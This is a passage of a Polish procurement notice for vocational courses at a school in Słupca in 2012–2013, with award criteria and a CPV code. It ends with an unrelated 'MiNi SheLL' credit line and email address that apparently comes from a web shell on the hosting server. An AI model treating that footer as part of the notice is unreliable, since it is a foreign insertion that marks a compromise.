Ucz. nabędą wiedzę i umiejętności  z zakresu: prowadzenia  PKPiR, rodzaji operacji ujmowanych w PKPiR, elementami prawa podatkowego, rodzajami dowodów księgowych, metodami korygowania błędnych dowodów księgowych, dodatkowych ewidencji  koniecznej dla prawidłowego prowadzenia PKPiR, obsługi programu PŁATNIK
Wykonawca zapewni niezbędne materiały szkoleniowe (odpowiednie dokumenty i druki).
2.10.  Kurs  Własna działalność gospodarcza-15os. 2gr, po 20h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013.	                          	 	            
Ucz. nabędą wiedzę i umiejętności z zakresu: czynności i dokumentów niezbędne do założenia firmy, wybór formy opodatkowania, dokumentacji w firmie Środki trwałe, rozliczeń z Urzędem Skarbowym i  ZUS, komunikacji interpersonalnej.
Wykonawca zapewni niezbędne materiały szkoleniowe ( odpowiednie dokumenty i druki ) .
2.11. KURS Zielona logistyka i zielony łańcuch dostaw w trosce o środowisko naturalne-15 os. 2gr, po  20h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013.	                          	 	                       
Ucz. nabędą wiedzę i umiejętności  z zakresu: Zielona logistyka Zarządzanie łańcuchem dostaw Produkcja Zarządzanie Warsztat-symulacja harmonogramowania prac. 
Wykonawca zapewni niezbędne materiały szkoleniowe ( odpowiednie dokumenty i druki ).
2.12. Kurs barman, kelner z modułem j. angielskiego 15 osób 2gr, po 20h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013	            
Ucz. nabędą wiedzę i umiejętności z zakresu obsługi konsumenta gastronomicznego również w j .angielskim. Wykonawca zapewni niezbędne materiały szkoleniowe.
 
Usługi będą realizowane w Zespole Szkół Ekonomicznych w Słupcy. Szczegółowy zakres, ilość i rodzaj zajęć przewidzianych do realizacji określa przedstawiony opis. Jednostka 1 h w SIWZ używana jest w rozumieniu 1 godziny lekcyjnej, czyli 45 minut.

Oznaczenie wg Wspólnego Słownika Zamówień: Kod CPV- 80.53.00.00-8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 20</li>
<li>3. Akredytacja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com